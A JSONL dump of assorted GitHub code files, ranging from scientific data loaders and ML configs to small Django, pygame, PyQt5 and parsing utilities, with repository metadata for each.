+{"seq_id":"73975493288","text":"#!/usr/bin/python\n#\n# description\n#\n# by AndBro @2023\n# __________________________\n\ndef __load_romy_raw(seed, starttime, endtime):\n\n    '''\n\n    VARIABLES:\n     - seed        seed code of the seismic station (e.g. \"BW.DROMY..FJU\")\n     - starttime   start date (str / UTCDateTime object)\n     - endtime     end date (str / UTCDateTime object)\n    \n    DEPENDENCIES:\n     - import obspy\n     - import io\n     - from pandas import date_range\n\n    OUTPUT:\n     - st          stream object\n    \n    EXAMPLE:\n    >>> __load_romy_raw(\"BW.DROMY..FJZ\", starttime, endtime)\n\n    '''\n\n    import obspy\n    import io\n    from pandas import date_range\n    \n    tbeg = obspy.UTCDateTime(starttime)\n    tend = obspy.UTCDateTime(endtime)\n\n    net, sta, loc, cha = seed.split(\".\")\n    \n    reclen = 512\n    chunksize = 100000 * reclen  # Around 50 MB\n    \n    st0 = obspy.Stream()\n    \n    for dt in date_range(tbeg.date, tend.date):\n        \n        doy = obspy.UTCDateTime(dt).julday\n        year = obspy.UTCDateTime(dt).year\n        \n        path = f\"/import/freenas-ffb-01-data/romy_archive/{year}/{net}/{sta}/{cha}.D/\"\n\n        with io.open(path+f\"{net}.{sta}.{loc}.{cha}.D.{year}.{doy}\", \"rb\") as fh:\n            while True:\n                with io.BytesIO() as buf:\n                    c = fh.read(chunksize)\n                    if not c:\n                        break\n                    buf.write(c)\n                    buf.seek(0, 0)\n                    st = obspy.read(buf)\n                    st0 += st\n    \n    st0.merge()\n    \n    return st0 \n\n\n\n\n## End of File\n","repo_name":"andbrocode/andbro_python","sub_path":"andbro__load_romy_raw.py","file_name":"andbro__load_romy_raw.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32450767897","text":"import transformers\n\nMAX_TOKEN_LEN = 512\nMAX_TARGET_LEN = 32\nBATCH_SIZE = 8\nEPOCHS = 2\nT5_PATH = \"input/t5-base\"\nMODEL_PATH = \"output/\"\nTOKENIZER = transformers.T5TokenizerFast.from_pretrained(\n    T5_PATH, do_lower_case=True\n)\n\nTRAIN_DATA = \"data/train-v2.0.json\"\nVAL_DATA = \"data/dev-v2.0.json\"","repo_name":"Mtaylert/nlp_research","sub_path":"question_answering/t5QA/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36259571135","text":"class Solution:\n    def firstUniqChar(self, s: str) -> int:\n        helper = {}\n        for i in s:\n            if i in helper:\n                helper[i] += 1\n            else:\n                helper[i] = 1\n        for i, n in enumerate(s):\n            if helper[n] == 1:\n                return i\n\n        return -1\n\n\nslu = Solution()\nprint(slu.firstUniqChar(\"loveleetcode\"))\n","repo_name":"kefirzhang/algorithms","sub_path":"leetcode/python/easy/p387_firstUniqChar.py","file_name":"p387_firstUniqChar.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21350291867","text":"from google.cloud import bigquery\n\n\ncounter = 0\nedges = {}\n\nclient = bigquery.Client()\n\ndef query_stackoverflow(curr_subreddit):\n    # get unique authors on subreddit\n    
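# note: interpolating values into SQL with .format is fragile; BigQuery query parameters would be safer\n    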
query_job = client.query(\n\"\"\"\nselect \n    distinct author\nfrom\n    `pushshift.rt_reddit.comments` comments\nwhere\n    comments.subreddit = \"{}\";\n\"\"\".format(curr_subreddit)\n)\n    results = query_job.result()  # Waits for job to complete.\n    print('received results! got redditors')\n    if (curr_subreddit not in edges):\n        edges[curr_subreddit] = set()\n\n    for redditor in results:\n        print('querying for redditor: {}'.format(redditor.author))\n        query_job = client.query(\n\"\"\"\nselect \n    distinct subreddit\nfrom\n    `pushshift.rt_reddit.comments` comments\nwhere\n    comments.author = \"{}\";\n\"\"\".format(redditor.author)\n        )\n        linked_subreddits = query_job.result()  # Waits for job to complete.\n        print('got subreddits: ')\n        for sub in linked_subreddits:\n            print('    {},'.format(sub.subreddit))\n            edges[curr_subreddit].add(sub.subreddit)\n        print(' fin ')\n\nif __name__ == '__main__':\n    query_stackoverflow('chess')\n","repo_name":"seankdecker/cs224w-final-proj","sub_path":"testing-google-cloud/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9341954330","text":"\"\"\"\nA class to keep track of which systems are modified during configure().\n\"\"\"\n\nfrom openmdao.utils.general_utils import all_ancestors\n\n\ndef _descendents(system, sysiter):\n    \"\"\"\n    Filter given iterator of system paths to include only system's descendants.\n\n    All pathnames are ancestors of system's descendants so a simple tree depth comparison\n    is sufficient to determine if a given path is a descendant.\n\n    Parameters\n    ----------\n    system : System\n        Starting system. We return only descendants of this system.\n    sysiter : iter of str\n        Iterator of pathnames of ancestors of system's descendants.\n\n    Yields\n    ------\n    str\n        Pathnames of descendants.\n    int\n        Number of system names in each pathname.\n    \"\"\"\n    mylen = system.pathname.count('.') + 1 if system.pathname else 0\n    for path in sysiter:\n        plen = path.count('.') + 1 if path else 0\n        if plen > mylen:\n            yield (path, plen)\n\n\nclass _ConfigInfo(object):\n    def __init__(self):\n        self._reset()\n\n    def _reset(self):\n        self._modified_systems = set()\n\n    def _add_mod_parallel_groups(self, group):\n        # if this group on any proc has local modified descendant systems that are parallel groups,\n        # this information needs to be known on all procs so that local parallel groups can\n        # be marked as modified if they have any modified descendants, even remote ones.\n        if group.comm.size > 1 and group._contains_parallel_group:\n            mod_pars = set()\n            if self._modified_systems:\n                prefix = group.pathname + '.' 
if group.pathname else ''\n                our_pars = [p for p in group._problem_meta['parallel_groups']\n                            if p.startswith(prefix)]\n                for par in our_pars:\n                    pre = par + '.'\n                    for spath in self._modified_systems:\n                        if spath.startswith(pre):\n                            mod_pars.add(par)\n                            break\n\n            all_mods = group.comm.allgather(mod_pars)\n\n            for mods in all_mods:\n                for mod in mods:\n                    self._modified_systems.update(all_ancestors(mod))\n\n    def _var_added(self, comp_path, vname):\n        self._modified_systems.update(all_ancestors(comp_path))\n\n    def _prom_added(self, group_path):\n        # don't update for top level group because we always call _setup_var_data on the\n        # top level group after configure\n        if group_path:\n            self._modified_systems.update(all_ancestors(group_path))\n\n    def _modified_system_iter(self, group):\n        \"\"\"\n        Iterate over modified systems in bottom-up order.\n\n        Parameters\n        ----------\n        group : Group\n            Group that has just been configured.\n\n        Yields\n        ------\n        System\n            Systems that have been modified.\n        \"\"\"\n        self._add_mod_parallel_groups(group)\n\n        len_prefix = len(group.pathname) + 1 if group.pathname else 0\n\n        # sort into longest first order so the systems will get updated bottom up\n        for path, _ in sorted(_descendents(group, self._modified_systems),\n                              key=lambda t: (t[1], t[0]), reverse=True):\n            s = group._get_subsystem(path[len_prefix:])\n            if s is group:\n                continue  # don't update this group because that will happen later\n            if s is not None and s._is_local:\n                yield s\n\n    def _update_modified_systems(self, group):\n        for s in self._modified_system_iter(group):\n            s._setup_var_data()\n","repo_name":"OpenMDAO/OpenMDAO","sub_path":"openmdao/core/configinfo.py","file_name":"configinfo.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"53"}
+{"seq_id":"33862851081","text":"import os\nimport sys\n\ncaption_txt_f = os.path.abspath(sys.argv[1])\nsplit_folder = os.path.abspath(sys.argv[2])\nimage_folder = os.path.abspath(sys.argv[3])\noutput_file = os.path.abspath(sys.argv[4])\n\nwith open(os.path.join(split_folder, \"Flickr_8k.trainImages.txt\")) as r:\n    train_paths = set(map(lambda x: x.strip(), r))\nwith open(os.path.join(split_folder, \"Flickr_8k.devImages.txt\")) as r:\n    dev_paths = set(map(lambda x: x.strip(), r))\nwith open(os.path.join(split_folder, \"Flickr_8k.testImages.txt\")) as r:\n    test_paths = set(map(lambda x: x.strip(), r))\n\nwith open(caption_txt_f, \"r\") as r, open(output_file + \".train.en\", \"w\") as train_en, \\\n        open(output_file + \".dev.en\", \"w\") as dev_en, open(output_file + \".test.en\", \"w\") as test_en:\n    for line in r:\n        spl = line.strip().split(\",\")\n        if spl[0] != \"image\":\n            path, caption = os.path.join(image_folder, spl[0]), \" \".join(spl[1:])\n            if spl[0] in train_paths:\n                train_en.write(path + \"\\t\" + caption + \"\\n\")\n            elif spl[0] in dev_paths:\n                dev_en.write(path + \"\\t\" + caption + \"\\n\")\n            elif spl[0] in test_paths:\n                test_en.write(path + \"\\t\" + caption + \"\\n\")\nwith open(os.path.join(split_folder, \"Flickr8k.arabic.full.txt\"), \"r\") as r, \\\n        open(output_file + \".train.ar\", \"w\") as train_ar, open(output_file + \".dev.ar\", \"w\") as dev_ar, \\\n        open(output_file + \".test.ar\", \"w\") as test_ar:\n    for line in r:\n        spl = line.strip().split(\"\\t\")\n        if spl[0] != \"image\":\n            
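# keys in the Arabic caption file end with a caption index (e.g. \"#0\"); [:-2] strips it to recover the image name\n            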
path, caption = os.path.join(image_folder, spl[0][:-2]), \" \".join(spl[1:])\n            if spl[0][:-2] in train_paths:\n                train_ar.write(path + \"\\t\" + caption + \"\\n\")\n            elif spl[0][:-2] in dev_paths:\n                dev_ar.write(path + \"\\t\" + caption + \"\\n\")\n            elif spl[0][:-2] in test_paths:\n                test_ar.write(path + \"\\t\" + caption + \"\\n\")\n","repo_name":"rasoolims/ImageTranslate","sub_path":"src/scripts/flickr/create_train_dev_list.py","file_name":"create_train_dev_list.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
+{"seq_id":"74407405928","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"RPBeta90Energy7TeV\")\n\n# Specify the maximum events to simulate\nprocess.maxEvents = cms.untracked.PSet(\n    input = cms.untracked.int32(10)\n)\n\n# Configure the output module (save the result in a file -- RPinelastic90.root)\nprocess.o1 = cms.OutputModule(\"PoolOutputModule\",\n    outputCommands = cms.untracked.vstring('keep *', \n        'drop *_*_TrackerHits*_*', \n        'drop *_*_Muon*_*', \n        'drop *_*_Ecal*_*', \n        'drop *_*_Hcal*_*', \n        'drop *_*_Calo*_*', \n        'drop *_*_Castor*_*', \n        'drop *_*_FP420SI_*', \n        'drop *_*_ZDCHITS_*'),\n    fileName = cms.untracked.string('file:input2.root')\n)\n\n# Configure whether you want detailed or simple log information.\n# LoggerMax -- detailed log info output including:\n#  - errors.log\n#  - warnings.log\n#  - infos.log\n#  - debugs.log\n# LoggerMin -- simple log info output to the standard output (e.g. screen)\n#process.load(\"Configuration.TotemCommon.LoggerMax_cfi\")\nprocess.load(\"Configuration.TotemCommon.LoggerMin_cfi\")\n\n# Use random number generator service\nprocess.load(\"Configuration.TotemCommon.RandomNumbers_cfi\")\n\n# Use particle table\nprocess.load(\"SimGeneral.HepPDTESSource.pdt_cfi\")\n\n# Geometry - beta* specific\nprocess.load(\"Configuration.TotemCommon.geometryRP_cfi\")\nprocess.XMLIdealGeometryESSource.geomXMLFiles.append('Geometry/TotemRPData/data/RP_Beta_90/RP_Dist_Beam_Cent.xml')\n\n# declare optics parameters\nprocess.load(\"Configuration.TotemOpticsConfiguration.OpticsConfig_7000GeV_90_cfi\")\n\n# Magnetic Field\n# by default we have 3.8T\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\n\n# Monte Carlo gun \nprocess.load(\"IOMC.FlatProtonLogKsiLogTGun.Beta90_cfi\")\n# process.FlatProtonLogKsiLogTGun.Verbosity = 1\n\n# Smearing\nprocess.load(\"IOMC.SmearingGenerator.SmearingGenerator_cfi\")\nprocess.SmearingGenerator.originalLabel = 'original'\nprocess.SmearingGenerator.modifyLabel = 'source'\nprocess.SmearingGenerator.verbosity = 0\n\n# Oscar - G4 simulation & proton transport\nprocess.load(\"Configuration.TotemCommon.g4SimHits_cfi\")\nprocess.g4SimHits.Physics.BeamProtTransportSetup = process.BeamProtTransportSetup\nprocess.g4SimHits.Generator.HepMCProductLabel = 'source' # energy+vertex smearing\nprocess.g4SimHits.G4EventManagerVerbosity = 0\nprocess.g4SimHits.G4StackManagerVerbosity = 0\nprocess.g4SimHits.G4TrackingManagerVerbosity = 0\nprocess.g4SimHits.MagneticField.Verbosity = False\nprocess.g4SimHits.Physics.Verbosity = 0\nprocess.g4SimHits.Physics.BeamProtTransportSetup.Verbosity = False\nprocess.g4SimHits.Generator.Verbosity = 0\nprocess.g4SimHits.SteppingAction.Verbosity = 0\nprocess.g4SimHits.Totem_RP_SD.Verbosity = 0\nprocess.g4SimHits.TotemSD.Verbosity = 0\n\n# No pile up for the mixing module\nprocess.load(\"SimGeneral.MixingModule.mixNoPU_cfi\")\n\n# RP Strip digitization\nprocess.load(\"SimTotem.RPDigiProducer.RPSiDetConf_cfi\")\n# process.RPSiDetDigitizer.RPVerbosity = 1\n\nprocess.load(\"RecoTotemRP.RPClusterizer.RPClusterizationConf_cfi\")\n# process.RPClustProd.Verbosity = 
1\n\nprocess.load(\"RecoTotemRP.RPRecoHitProducer.RPRecoHitProdConf_cfi\")\n# process.RPHecoHitProd.Verbosity = 1\n\nprocess.load(\"RecoTotemRP.RPSingleCandidateTrackFinder.RPSingleTrackCandFindConf_cfi\")\n# process.RPSinglTrackCandFind.Verbosity = 1\n\nprocess.load(\"RecoTotemRP.RPTrackCandidateCollectionFitter.RPSingleTrackCandCollFitted_cfi\")\n# process.RPSingleTrackCandCollFit.Verbosity = 1\n\nprocess.p1 = cms.Path(process.SmearingGenerator*process.g4SimHits*process.mix*process.RPSiDetDigitizer*process.RPClustProd*process.RPHecoHitProd*process.RPSinglTrackCandFind*process.RPSingleTrackCandCollFit)\n\nprocess.outpath = cms.EndPath(process.o1)\n","repo_name":"elizamelo/CMSTOTEMSim","sub_path":"CMSSW_7_0_4/src/L1TriggerTotem/CoincidenceChip/test/simdigi_cfg.py","file_name":"simdigi_cfg.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14391748760","text":"from django import forms\n\n\nclass searchform(forms.Form):\n \"\"\"\n Form model for search bar\n \"\"\"\n\n search = forms.CharField(\n label=\"Search\",\n required=False,\n widget=forms.TextInput(attrs={\"placeholder\": \"Search Encyclopedia\"}),\n )\n\n\nclass newpageform(forms.Form):\n \"\"\"\n Form model for creation of new entry\n \"\"\"\n\n title = forms.CharField(\n label=\"Title\",\n required=True,\n widget=forms.TextInput(\n attrs={\"placeholder\": \"Page Title...\", \"class\": \"col-sm-11\"}\n ),\n )\n\n body = forms.CharField(\n label=\"Content\",\n required=False,\n widget=forms.Textarea(\n attrs={\"placeholder\": \"Markdown Content...\", \"class\": \"col-sm-11\"}\n ),\n )\n\n\nclass editpageform(forms.Form):\n \"\"\"\n Form model for editing of entry\n \"\"\"\n\n title = forms.CharField(label=\"Title\", required=False, widget=forms.HiddenInput())\n\n body = forms.CharField(\n label=\"Content\",\n required=False,\n widget=forms.Textarea(attrs={\"class\": \"col-sm-11\"}),\n )\n","repo_name":"pudimlucy/CS50w","sub_path":"wiki/wiki/encyclopedia/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11207617382","text":"from utils import *\nimport json\n\nif __name__ == \"__main__\":\n\n json_path = \"/home/xhu/Code/auto_annotation/src/config.json\"\n with open(json_path, 'r') as f:\n cfg = json.load(f)\n\n gt = GTdata(cfg[\"xml_path\"])\n\n interval = cfg[\"intervals\"]\n\n assert len(interval) > 0, \"No valid interval.\"\n\n frame_list = frame_list_gen(cfg[\"img_path\"], start = interval[0][0], end = interval[-1][-1])\n\n final_interval = []\n\n false_interval = []\n\n viou_thresh = cfg[\"viou_thresh\"]\n\n # f_bbox_traj = {}\n # b_bbox_traj = {}\n\n # Total number of tracker to be tried\n track_num = len(cfg[\"track_type\"])\n i_bbox_traj = {}\n\n while(len(interval)>0):\n cur_interval = interval[0]\n interval = interval[1:]\n\n f_bbox_traj = {}\n b_bbox_traj = {}\n\n print(cur_interval)\n # if the current interval contains less than 3 frames, then stop tracking, \n # Since the middle frame can be labeled by linear interpolation\n if cur_interval[1] - cur_interval[0] <2 :\n false_interval.append(cur_interval)\n # Linear Interpolation\n length = cur_interval[1] - cur_interval[0]\n bbox_0 = gt.get_bbox(cfg[\"obj_id\"], cur_interval[0])\n bbox_1 = gt.get_bbox(cfg[\"obj_id\"], cur_interval[1])\n\n for idx in range(cur_interval[0], cur_interval[1] + 1):\n weight = (idx - cur_interval[0])/length\n 
bbox_interpolate = (bbox_0[0]*(1 - weight) + bbox_1[0]*weight,\n                                    bbox_0[1]*(1 - weight) + bbox_1[1]*weight,\n                                    (bbox_0[2]*(1 - weight) + bbox_1[2]*weight),\n                                    (bbox_0[3]*(1 - weight) + bbox_1[3]*weight))\n\n                i_bbox_traj[idx] = bbox_interpolate\n            print(\"The result is manually labeled.\")\n            continue\n\n\n        viou_max = 0\n        tracker_tried = 0\n        \n        # Track the interval by all selected trackers\n        for tracker in cfg[\"track_type\"]:\n            viou, ftrack, btrack = tracker_eval(gt, frame_list, cur_interval[0], cur_interval[1], tracker, cfg[\"obj_id\"])\n            tracker_tried += 1\n            if viou >= viou_thresh and viou > viou_max:\n                # add the current interval into the final interval list if it hasn't been added before\n                if viou_max == 0:\n                    final_interval.append(cur_interval)\n\n                length = cur_interval[1] - cur_interval[0] + 1\n\n                # Calculate the interpolated trajectory between forward and backward tracking\n                i_bboxes = for_back_interpolation(ftrack, btrack)\n\n                for idx in range(0, length):\n                    i_bbox_traj[idx + cur_interval[0]] = i_bboxes[idx]\n\n                viou_max = viou\n            \n            else:\n                # If all methods are tried and none tracked successfully\n                if (tracker_tried == track_num) and (viou_max == 0):\n                    mid = (cur_interval[1]+cur_interval[0])//2\n                    interval.append([cur_interval[0], mid])\n                    interval.append([mid, cur_interval[1]])\n    \n    # print(final_interval, false_interval)\n\n    # Generate a list to record all manually labeled frame ids\n    manual_label = len(final_interval) + len(false_interval)+1\n    print(f\"There are {manual_label} frames that need to be manually labeled.\")\n    all_interval = final_interval + false_interval\n\n    keyframe = set()\n\n    for interval in all_interval:\n        keyframe.add(interval[0])\n        keyframe.add(interval[1])\n    \n    # Get the gt trajectory\n    gt_bbox_traj = gt.get_bboxes(cfg[\"obj_id\"])\n\n    # Calculate the viou over ground truth\n    gt_viou = viou_gt(gt_bbox_traj, i_bbox_traj)\n\n    print(f\"The viou between the estimation and gt is {gt_viou}\")\n\n    # Draw the bboxes onto the frames\n    draw_result(frame_list, i_bbox_traj, cfg[\"save_path\"], True, gt_bbox_traj, True, keyframe)\n\n# [[0,143], [263, 359]]\n# [[0,124]]","repo_name":"haliphinx/semi_auto_annotation","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23725981554","text":"import pygame\nfrom pygame.sprite import Sprite\n\n\nclass Alien(Sprite):\n    \"\"\"A class representing a single Alien in the fleet.\"\"\"\n\n    def __init__(self, ai_settings, screen):\n        \"\"\"Initializes the Alien and sets its initial position.\"\"\"\n        super(Alien, self).__init__()\n        self.screen = screen\n        self.ai_settings = ai_settings\n        # Loads the Alien image and sets its rect attribute.\n        self.image = pygame.image.load(\"images/alien.bmp\")\n        self.rect = self.image.get_rect()\n        # Starts each new Alien near the top left of the screen.\n        self.rect.x = self.rect.width\n        self.rect.y = self.rect.height\n        # Stores the Alien's exact position.\n        self.x = float(self.rect.x)\n\n    def blitme(self):\n        \"\"\"Draws the Alien in its current position.\"\"\"\n        self.screen.blit(self.image, self.rect)\n\n    def update(self):\n        \"\"\"Moves the Alien to the right or to the left.\"\"\"\n        self.x += (self.ai_settings.alien_speed_factor * self.ai_settings.fleet_direction)\n        self.rect.x = self.x\n\n    def check_edges(self):\n        \"\"\"Returns True if the Alien is at the edge of the screen.\"\"\"\n        screen_rect = self.screen.get_rect()\n        if self.rect.right >= screen_rect.right:\n            return True\n        elif 
self.rect.left <= 0:\n            return True\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"livro_intensivo_de_python/alien_invasion/alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"35088420456","text":"import re\n\ndef verificar_equilibrio_ruby(codigo):\n    stack = []\n    lineas = codigo.split(\"\\n\")\n\n    for numero_linea, linea in enumerate(lineas, start=1):\n        inicio = re.search(r'\\b(if |unless|while|until|for|case|class|def)\\b', linea)\n        final = re.search(r'\\bend\\b', linea)\n\n        if inicio:\n            # use a tuple, not a set: a set has no reliable order for the unpacking done below\n            stack.append((inicio.group(), numero_linea))\n        if final:\n            if not stack:\n                print(f\"Falta un 'end' en la línea {numero_linea}\")\n                return f\"Falta un 'end' en la línea {numero_linea}\"\n            else:\n                stack.pop()\n\n        if \"if\" in linea:\n            if \"key\" in linea:\n                pattern = r'if\\s+\\w+\\s*\\.key\\?\\(\\w+\\)\\s*(?:&&\\s*\\w+\\s*\\.key\\?\\(\\w+\\))?\\s*$'\n                if re.match(pattern, linea):\n                    print(\"La cadena es válida.\")\n                else:\n                    pattern2 = r'^\\s*if\\s+\\w+\\s*\\[\\w+\\]\\.key\\?\\(\\w+\\)\\s*$'\n                    if re.match(pattern2, linea):\n                        print(\"La cadena es válida.\")\n                    else:\n                        return f\"Error en el if en la línea {numero_linea}\"\n    \n    # check for any opener left without a matching 'end'\n    for estructura, numero_linea in stack:\n        print(f\"falta un end para '{estructura}' en el código linea '{numero_linea}'\")\n        return f\"falta un end para '{estructura}' en el código linea '{numero_linea}'\"\n    resultado = validar_diccionario_ruby(codigo)\n\n    if resultado:\n        return str(resultado)\n    \n\ndef validar_estructuras_ruby(codigo_ruby):\n    lineas = codigo_ruby.split('\\n')\n    variables_definidas = set()\n    patrones = {\n        r'^\\s*if\\s*(\\([^)]+\\))?([^:]+)$': \"if\",\n        r'^\\s*while\\s*(\\([^)]+\\))?([^:]+)$': \"while\",\n        r'^\\s*elsif\\s*(\\([^)]+\\))?([^:]+)$': \"elsif\",\n        r'^\\s*unless\\s*(\\([^)]+\\))?([^:]+)$': \"unless\", \n        r'^\\s*until\\s*(\\([^)]+\\))?([^:]+)$': \"until\"\n    }\n\n    for numero_linea, linea in enumerate(lineas, start=1):\n        for patron, estructura in patrones.items():\n            if re.search(r'\\b' + estructura + r'\\b', linea) and not re.search(r'([\"\\']).*?\\1', linea):\n                match = re.match(patron, linea)\n                if match:\n                    condicion = match.group(2).strip()\n                    for token in re.findall(r'\\w+|\\d+|\\S', condicion):\n                        if token.isalpha() and token not in variables_definidas and token != \"then\":\n                            if token != \"key\":\n                                print(f\"Error en la línea {numero_linea}: La variable '{token}' en la condición del '{estructura}' no está definida en líneas anteriores.\")\n                                return f\"Error en la línea {numero_linea}: La variable '{token}' en la condición del '{estructura}' no está definida en líneas anteriores.\"\n                else:\n                    print(f\"Error en la línea {numero_linea}: La línea '{linea.strip()}' no tiene la sintaxis correcta de un '{estructura}'.\")\n                    return f\"Error en la línea {numero_linea}: La línea '{linea.strip()}' no tiene la sintaxis correcta de un '{estructura}'.\"\n\n        # collect variables defined on previous lines\n        for variable in re.findall(r'\\w+', linea):\n            variables_definidas.add(variable)\n\n\n\ndef validar_for_ruby(codigo_ruby):\n    lineas = codigo_ruby.split('\\n')\n    patron_for = r'^\\s*for\\s+([a-zA-Z_]\\w*)\\s+in\\s+([a-zA-Z_]\\w*|\\d+\\.\\.\\d+)\\s*$'  # regex matching \"for variable in variable_o_rango\"\n\n    for numero_linea, linea in enumerate(lineas, start=1):\n        if re.search(r'\\bfor\\b', linea) and not re.search(r'([\"\\']).*?\\1', linea):\n            match = 
re.match(patron_for, linea)\n            if match:\n                variable = match.group(1)\n                variable_o_rango = match.group(2)\n                if not variable.isspace():\n                    if '..' in variable_o_rango:\n                        rangos = variable_o_rango.split('..')\n                        if len(rangos) != 2 or not rangos[0].isdigit() or not rangos[1].isdigit():\n                            print(f\"Error en la línea {numero_linea}: El rango '{variable_o_rango}' después de 'in' no es válido.\")\n                    elif not variable_o_rango.isalpha():\n                        print(f\"Error en la línea {numero_linea}: '{variable_o_rango}' después de 'in' no es una variable o un rango válido.\")\n            else:\n                print(f\"Error en la línea {numero_linea}: La línea '{linea.strip()}' no tiene la sintaxis correcta de un 'for'.\")\n\n\ndef validar_diccionario_ruby(texto):\n    \n    patron_corchetes = re.compile(r'[{}]')\n    \n    # stack used to track opened braces\n    pila_corchetes = []\n    \n    # flag used to track whether we are inside a dictionary\n    dentro_diccionario = False\n    \n    # split the text into lines and keep track of the current line number\n    lineas = texto.split('\\n')\n    numero_linea = 0\n    \n    nlinea = 0\n    for linea in lineas:\n        numero_linea += 1\n        # check whether the line contains braces\n        if re.search(patron_corchetes, linea):\n            for caracter in linea:\n                if caracter == '{':\n                    pila_corchetes.append('{')\n                    # on finding a '{', check whether we are inside a dictionary\n                    if not dentro_diccionario and re.search(r'\\w+\\s*=\\s*\\{', linea):\n                        dentro_diccionario = True\n                    else:\n                        nlinea = numero_linea\n                elif caracter == '}':\n                    if not pila_corchetes:\n                        return f\"Error: Corchete de cierre sin coincidencia en la línea {numero_linea}\"\n                    pila_corchetes.pop()\n    \n    # if any braces are left on the stack, there is an error\n    if pila_corchetes:\n        return \"Error: Corchete de apertura sin coincidencia\"\n    \n    # if no brace errors were found but we never entered a dictionary, report it\n    if not dentro_diccionario:\n        return f\"No se encontro un diccionario para la conversion\"\n","repo_name":"DuvanFelipeDeveloper/CompiladorLenguajesFormales","sub_path":"analizadores/ruby/analizador_error.py","file_name":"analizador_error.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"40183729730","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QToolTip, QWidget\r\nfrom PyQt5 import QtWidgets\r\nfrom PyQt5.QtGui import QIcon, QPalette, QColor\r\n\r\nclass Color(QWidget):\r\n    def __init__(self, color):\r\n        super(Color, self).__init__()\r\n        self.setAutoFillBackground(True)\r\n\r\n        palette = self.palette()\r\n        palette.setColor(QPalette.Window, QColor(color))\r\n        self.setPalette(palette)\r\n\r\nclass Window(QMainWindow):\r\n    def __init__(self):\r\n        super(Window, self).__init__()\r\n\r\n        # hlayout1 = QtWidgets.QHBoxLayout() #? Create a Horizontal Layout\r\n        # hlayout1.addWidget(Color(\"light pink\"))\r\n        # hlayout1.addWidget(Color(\"light blue\"))\r\n        # hlayout1.addWidget(Color(\"light green\"))\r\n        # hlayout1.setContentsMargins(30,20,0,30) #? Margin (left, top, right, bottom)\r\n        # hlayout1.setSpacing(30) #? Space between widgets\r\n\r\n        # hlayout2 = QtWidgets.QHBoxLayout() #? Create a Horizontal Layout\r\n        # hlayout2.addWidget(Color(\"purple\"))\r\n        # hlayout2.addWidget(Color(\"orange\"))\r\n\r\n        # vlayout = QtWidgets.QVBoxLayout() #? Create a Vertical Layout\r\n        # vlayout.addLayout(hlayout1) #? 
Add h-layout in v-layout\r\n        # vlayout.addLayout(hlayout2)\r\n\r\n        layout = QtWidgets.QGridLayout()\r\n        layout.addWidget(Color(\"red\"), 0,0) #? (0,0) matrix in Grid Layout\r\n        layout.addWidget(Color(\"light blue\"), 1,1) #? (1,1) matrix in Grid Layout\r\n        layout.addWidget(Color(\"light green\"), 0,2) #? (0,2) matrix in Grid Layout\r\n\r\n        widget = QWidget()\r\n        widget.setLayout(layout) #? Screen Layout Design\r\n        self.setCentralWidget(widget) #? Screen (window) color\r\n        \r\n        self.setWindowTitle(\"Application\") #? Window Title\r\n        self.setGeometry(200,200,500,300) #? (x, y, size-w, size-h)\r\n        self.setWindowIcon(QIcon(\"icon.png\")) #? Icon\r\n        self.setToolTip(\"Application\")\r\n        self.initUI()\r\n\r\n    def initUI(self):\r\n        self.lbl_name = QtWidgets.QLabel(self) #? Label of win form\r\n        self.lbl_name.setText(\"First Name: \")\r\n        self.lbl_name.move(50,30) #? (x, y)\r\n\r\n        self.lbl_surname = QtWidgets.QLabel(self) #? Label of win form\r\n        self.lbl_surname.setText(\"Last Name: \")\r\n        self.lbl_surname.move(50,70) #? (x, y)\r\n\r\n        self.lbl_result = QtWidgets.QLabel(self) #? Label of win form\r\n        self.lbl_result.move(150, 150) #? (x, y)\r\n        self.lbl_result.setText(\"Result\")\r\n        self.lbl_result.resize(300,50)\r\n\r\n        self.txt_name = QtWidgets.QLineEdit(self) #? Text of win form\r\n        self.txt_name.move(150, 30) #? (x, y)\r\n        self.txt_name.resize(200,25) #? (size-w, size-h)\r\n\r\n        self.txt_surname = QtWidgets.QLineEdit(self) #? Text of win form\r\n        self.txt_surname.move(150, 70) #? (x, y)\r\n        self.txt_surname.resize(200,25) #? (size-w, size-h)\r\n\r\n        self.btn_save = QtWidgets.QPushButton(self)\r\n        self.btn_save.setText(\"Save\")\r\n        self.btn_save.move(150,110)\r\n        self.btn_save.clicked.connect(self.clicked)\r\n\r\n    def clicked(self):\r\n        self.lbl_result.setText(f\"Name: {self.txt_name.text()}\\nSurname: {self.txt_surname.text()}\")\r\n\r\ndef window():\r\n    app = QApplication(sys.argv) #? to be able to use system arguments\r\n    win = Window() #? Create Window\r\n    win.show() #? Show Window\r\n    sys.exit(app.exec()) #? use exec on app, for system 